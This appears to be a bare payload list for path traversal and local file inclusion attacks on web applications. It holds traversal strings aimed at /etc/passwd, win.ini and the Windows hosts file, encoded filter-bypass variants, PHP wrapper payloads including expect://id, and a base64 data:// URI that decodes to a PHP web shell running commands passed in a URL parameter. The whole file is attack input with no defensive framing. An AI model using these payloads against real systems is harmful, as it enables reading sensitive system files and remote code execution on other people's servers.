../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
....//....//....//etc/passwd
....\\....\\....\\etc\\passwd
..\..\..\..\windows\win.ini
..\..\..\..\..\windows\win.ini
/etc/passwd
\windows\win.ini
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=../../../etc/passwd
file:///etc/passwd
file:///c:/windows/win.ini
expect://id
php://input
php://filter/read=string.rot13/resource=/etc/passwd
php://filter/zlib.deflate/resource=/etc/passwd
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd